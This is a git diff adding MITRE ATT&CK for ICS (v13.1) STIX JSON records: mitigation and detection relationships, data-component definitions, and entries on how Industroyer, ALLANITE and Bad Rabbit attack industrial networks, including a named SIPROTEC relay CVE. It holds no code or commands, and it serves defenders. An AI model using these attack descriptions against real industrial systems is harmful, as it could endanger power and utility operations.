-0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--a5694cf6-a521-431f-bab5-5c501c540863", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--f347b4fe-d829-427d-851a-fff3393441db", + "created": "2021-04-12T07:57:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Joe Slowik August 2019", + "description": "Joe Slowik 2019, August 15 CRASHOVERRIDE: Reassessing the 2016 Ukraine Electric Power Event as a Protection-Focused Attack Retrieved. 2019/10/22 ", + "url": "https://dragos.com/wp-content/uploads/CRASHOVERRIDE.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-14T20:00:00.650Z", + "description": "[Industroyer](https://attack.mitre.org/software/S0604) contained a module which leveraged a vulnerability in the Siemens SIPROTEC relays (CVE-2015-5374) to create a Denial of Service against automated protective relays. (Citation: Joe Slowik August 2019)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--2bb4d762-bf4a-4bc3-9318-15cc6a354163", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--f703f8b2-b6b9-41f3-a551-6bb3647c45cc.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--f703f8b2-b6b9-41f3-a551-6bb3647c45cc.json new file mode 100644 index 0000000000000000000000000000000000000000..f981ffe6e630df01e208b836e3b54afd9c5fbe87 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--f703f8b2-b6b9-41f3-a551-6bb3647c45cc.json @@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--e9a0d105-e7d9-454a-916a-4af8349c6f3f", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f703f8b2-b6b9-41f3-a551-6bb3647c45cc", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.147Z", + "relationship_type": "mitigates", + "description": "Use file system access controls to protect system and application folders.\n", + "source_ref": "course-of-action--f9fcb3ec-6de0-4559-8cd9-ef1c0c7d1971", + "target_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fb80368e-b3f6-4fa3-828b-b1cf792ea161.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fb80368e-b3f6-4fa3-828b-b1cf792ea161.json new file mode 100644 index 0000000000000000000000000000000000000000..e89f5818a3771f912e68ab8fa4966d554ef8eb40 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fb80368e-b3f6-4fa3-828b-b1cf792ea161.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--6de6ffe5-33d4-490c-b16f-dcd44b4b0862", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--fb80368e-b3f6-4fa3-828b-b1cf792ea161", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:58:34.751Z", + "description": "Monitor executed commands and arguments for binaries that could be involved in data destruction activity, such as SDelete.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "target_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fc1d3924-3210-4ca6-b3cc-a7a525eab47c.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fc1d3924-3210-4ca6-b3cc-a7a525eab47c.json new file mode 100644 index 0000000000000000000000000000000000000000..24c0f17f3893d07e4e537d534e3abb47487d46b6 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fc1d3924-3210-4ca6-b3cc-a7a525eab47c.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--5150c355-da60-4545-942f-e05b0c990a36", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--fc1d3924-3210-4ca6-b3cc-a7a525eab47c", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T17:15:27.767Z", + "description": "Monitor ICS management protocols / file transfer protocols for protocol functions related to firmware changes.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fc3d0a84-e7c7-415c-ae47-42bc513e9bf9.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fc3d0a84-e7c7-415c-ae47-42bc513e9bf9.json new file mode 100644 index 0000000000000000000000000000000000000000..46b1be2ca1cf48275d7f46da205636aed275b799 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fc3d0a84-e7c7-415c-ae47-42bc513e9bf9.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--f2bbdc55-1d66-4999-8df5-4ff3226eeb1c", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--fc3d0a84-e7c7-415c-ae47-42bc513e9bf9", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:55:14.825Z", + "description": "Monitor for network traffic originating from unknown/unexpected hosts. Local network traffic metadata (such as source MAC addressing) as well as usage of network management protocols such as DHCP may be helpful in identifying hardware.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fc4803cb-d6bf-4674-bf40-d4b0997824ba.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fc4803cb-d6bf-4674-bf40-d4b0997824ba.json new file mode 100644 index 0000000000000000000000000000000000000000..f2f261719dd74143902be746a2df51db4aba1d2f --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fc4803cb-d6bf-4674-bf40-d4b0997824ba.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--ec4162c6-78b7-4e8f-bb4e-26114d59f0cf", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--fc4803cb-d6bf-4674-bf40-d4b0997824ba", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Eduard Kovacs May 2018", + "description": "Eduard Kovacs 2018, May 10 'Allanite' Group Targets ICS Networks at Electric Utilities in US, UK Retrieved. 2020/01/03 ", + "url": "https://www.securityweek.com/allanite-group-targets-ics-networks-electric-utilities-us-uk" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T15:40:42.440Z", + "description": "[ALLANITE](https://attack.mitre.org/groups/G1000) leverages watering hole attacks to gain access into electric utilities. (Citation: Eduard Kovacs May 2018)", + "relationship_type": "uses", + "source_ref": "intrusion-set--190242d7-73fc-4738-af68-20162f7a5aae", + "target_ref": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fc6cc5f2-ef5b-4a28-a0b2-a277ee98191d.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fc6cc5f2-ef5b-4a28-a0b2-a277ee98191d.json new file mode 100644 index 0000000000000000000000000000000000000000..78997362f9fd962df18ed6bb16892289f133501a --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fc6cc5f2-ef5b-4a28-a0b2-a277ee98191d.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--85a2fb2f-44e8-47ff-8a74-a0ebbedbc59c", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--fc6cc5f2-ef5b-4a28-a0b2-a277ee98191d", + "created": "2022-05-11T16:22:58.808Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:45:25.119Z", + "description": "Monitor and analyze traffic patterns and packet inspection associated with web-based network connections that are sent to malicious or suspicious destinations (e.g., destinations attributed to phishing campaigns). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments (e.g., monitor anomalies in use of files that do not normally initiate network connections or unusual connections initiated by regsvr32.exe, rundll.exe, SCF, HTA, MSI, DLLs, or msiexec.exe).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fcb7733f-553d-43de-a8c6-c85a5cd65041.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fcb7733f-553d-43de-a8c6-c85a5cd65041.json new file mode 100644 index 0000000000000000000000000000000000000000..d113d21681fdf4e234cb91916e1267c855618c8d --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fcb7733f-553d-43de-a8c6-c85a5cd65041.json @@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--7fe99b7e-ebe1-40f9-a50c-6d65c3055787", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--fcb7733f-553d-43de-a8c6-c85a5cd65041", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.111Z", + "relationship_type": "mitigates", + "description": "Segment externally facing servers and services from the rest of the network with a DMZ or on separate hosting infrastructure.\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--32632a95-6856-47b9-9ab7-fea5cd7dce00", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fcd3fdbf-4909-48ab-85c4-ce4b34172eb0.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fcd3fdbf-4909-48ab-85c4-ce4b34172eb0.json new file mode 100644 index 0000000000000000000000000000000000000000..cbc9a7d4e1240f6741cf245d150ad9edfd17fe83 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fcd3fdbf-4909-48ab-85c4-ce4b34172eb0.json @@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--f3447827-2f92-47e5-88d0-f0e0e3f33016", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--fcd3fdbf-4909-48ab-85c4-ce4b34172eb0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.106Z", + "relationship_type": "mitigates", + "description": "Restrict browsers to limit the capabilities of malicious ads and Javascript.\n", + "source_ref": "course-of-action--143b4398-3222-480a-b6a4-e131bc2d3144", + "target_ref": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fd0340cc-6105-4abd-89d0-60b0d9c00b55.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fd0340cc-6105-4abd-89d0-60b0d9c00b55.json new file mode 100644 index 0000000000000000000000000000000000000000..a4748065144e091df00855b940716ca429bb8e12 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fd0340cc-6105-4abd-89d0-60b0d9c00b55.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--0c2227bf-6aca-49db-b8ca-073b454ab2fe", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--fd0340cc-6105-4abd-89d0-60b0d9c00b55", + "created": "2022-09-27T18:41:43.617Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T18:41:43.617Z", + "description": "Collecting information from the I/O image requires analyzing the application program running on the PLC for specific data block reads. Detecting this requires obtaining and analyzing a PLC\u2019s application program, either directly from the device or from asset management platforms.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--8ed4e6d0-56d7-4e6b-8fa6-41f41631f30d", + "target_ref": "attack-pattern--53a48c74-0025-45f4-b04a-baa853df8204", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fd856176-396c-4121-9754-35e49bfa5758.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fd856176-396c-4121-9754-35e49bfa5758.json new file mode 100644 index 0000000000000000000000000000000000000000..6351087b8699e965dfeb81a8a36a7146d8df9649 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fd856176-396c-4121-9754-35e49bfa5758.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--7648e9f3-c30d-43ce-8bbe-9b81eec8a9a3", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--fd856176-396c-4121-9754-35e49bfa5758", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:41:55.062Z", + "description": "Monitor for newly constructed network connections to untrusted hosts that are used to send or receive data.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba", + "target_ref": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fe22637e-7187-4990-b24a-5dc851eec736.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fe22637e-7187-4990-b24a-5dc851eec736.json new file mode 100644 index 0000000000000000000000000000000000000000..584967789899528a61150b03236e4cfbe266d49b --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fe22637e-7187-4990-b24a-5dc851eec736.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--18618d5c-4f57-4b66-bb18-ae727d25dd8e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--fe22637e-7187-4990-b24a-5dc851eec736", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:08:55.507Z", + "description": "Monitor for lack of operational process data which may help identify a loss of communications. This will not directly detect the technique\u2019s execution, but instead may provide additional evidence that the technique has been used and may complement other detections.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--931b3fc6-ad68-42a8-9018-e98515eedc95", + "target_ref": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--ff3f0668-98df-44c1-88c2-711f05720eb8.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--ff3f0668-98df-44c1-88c2-711f05720eb8.json new file mode 100644 index 0000000000000000000000000000000000000000..be3286ed51a6ed96161f46ede52de353ed73759b --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--ff3f0668-98df-44c1-88c2-711f05720eb8.json @@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--8f473458-4475-4ce2-a345-8b3839b5bba5", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ff3f0668-98df-44c1-88c2-711f05720eb8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.060Z", + "relationship_type": "mitigates", + "description": "Restrict configurations changes and firmware updating abilities to only authorized individuals.\n", + "source_ref": "course-of-action--e0d38502-decb-481d-ad8b-b8f0a0c330bd", + "target_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--ffc5bbce-8d9c-4276-9dc6-efed5c01af8b.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--ffc5bbce-8d9c-4276-9dc6-efed5c01af8b.json new file mode 100644 index 0000000000000000000000000000000000000000..befda62f01344d15810efc400f4a53d817352f35 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--ffc5bbce-8d9c-4276-9dc6-efed5c01af8b.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--dfb1013c-0f53-4ca3-b393-1795aed32ea1", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ffc5bbce-8d9c-4276-9dc6-efed5c01af8b", + "created": "2017-05-31T21:33:27.074Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Joe Slowik April 2019", + "description": "Joe Slowik 2019, April 10 Implications of IT Ransomware for ICS Environments Retrieved. 2019/10/27 ", + "url": "https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:31:37.216Z", + "description": "[Bad Rabbit](https://attack.mitre.org/software/S0606) can move laterally through industrial networks by means of the SMB service. (Citation: Joe Slowik April 2019)", + "relationship_type": "uses", + "source_ref": "malware--2eaa5319-5e1e-4dd7-bbc4-566fced3964a", + "target_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--1177a4c5-31c8-400c-8544-9071166afa0e.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--1177a4c5-31c8-400c-8544-9071166afa0e.json new file mode 100644 index 0000000000000000000000000000000000000000..11f7d88888673b069f4454dfd1d0d22f0761d720 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--1177a4c5-31c8-400c-8544-9071166afa0e.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--3f98e79d-b060-4d21-9939-fa3e5f82ec21", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--1177a4c5-31c8-400c-8544-9071166afa0e", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Windows Registry Key Deletion", + "description": "Removal of a Registry Key (ex: Windows EID 4658 or Sysmon EID 12)", + "x_mitre_data_source_ref": "x-mitre-data-source--0f42a24c-e035-4f93-a91c-5f7076bd8da0", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba.json new file mode 100644 index 0000000000000000000000000000000000000000..d83ca44923920d19415815b49c813b32cf081b2d --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba.json @@ -0,0 +1,25 @@ +{ + "type": "bundle", + "id": "bundle--a989723d-59c1-4015-b9bf-c3ea5814a323", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-20T20:18:06.745Z", + "name": "Network Connection Creation", + "description": "Initial construction of a network connection, such as capturing socket information with a source/destination IP and port(s) (ex: Windows EID 5156, Sysmon EID 3, or Zeek conn.log)", + "x_mitre_data_source_ref": "x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71.json new file mode 100644 index 0000000000000000000000000000000000000000..3a7368adfa3c126909e740fd0f26c428f7df0513 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--ee065291-1eb2-435f-8476-778e909142e8", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "File Access", + "description": "Opening a file, which makes the file contents available to the requestor (ex: Windows EID 4663)", + "x_mitre_data_source_ref": "x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c.json new file mode 100644 index 0000000000000000000000000000000000000000..2a7f9ed54bd432f37924f7ea271dd5233f84dfbe --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--23cd6758-091f-430b-aeb8-c9b3e0759bf0", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "File Creation", + "description": "Initial construction of a new file (ex: Sysmon EID 11)", + "x_mitre_data_source_ref": "x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c.json new file mode 100644 index 0000000000000000000000000000000000000000..4f15b59d382bc5616ce21017f6870bdbc96d1010 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--3bad91a0-93d7-444f-b0a7-226715e75e6b", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Network Traffic Content", + "description": "Logged network traffic data showing both 